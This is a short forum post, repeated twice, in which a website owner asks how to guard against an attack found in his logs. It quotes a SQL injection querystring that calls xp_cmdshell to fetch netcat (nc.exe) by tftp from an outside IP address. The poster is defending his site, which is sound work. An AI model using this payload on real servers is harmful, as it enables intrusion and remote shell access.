Hi Folks,
I'm not sure if I am entering this in the correct forum but I'll give it a try. I have a script which monitors my website logfiles looking for any strange. In last nights logfiles, I noticed that someone entered the following querystring at the end of one of my page URLs:
action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral
This to me looks like someone was trying to execute a script on my website - start a shell script, ftp a file and run it.
How do I guard against something like that?
Mighty
I'm not sure if I am entering this in the correct forum but I'll give it a try. I have a script which monitors my website logfiles looking for any strange. In last nights logfiles, I noticed that someone entered the following querystring at the end of one of my page URLs:
action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral
This to me looks like someone was trying to execute a script on my website - start a shell script, ftp a file and run it.
How do I guard against something like that?
Mighty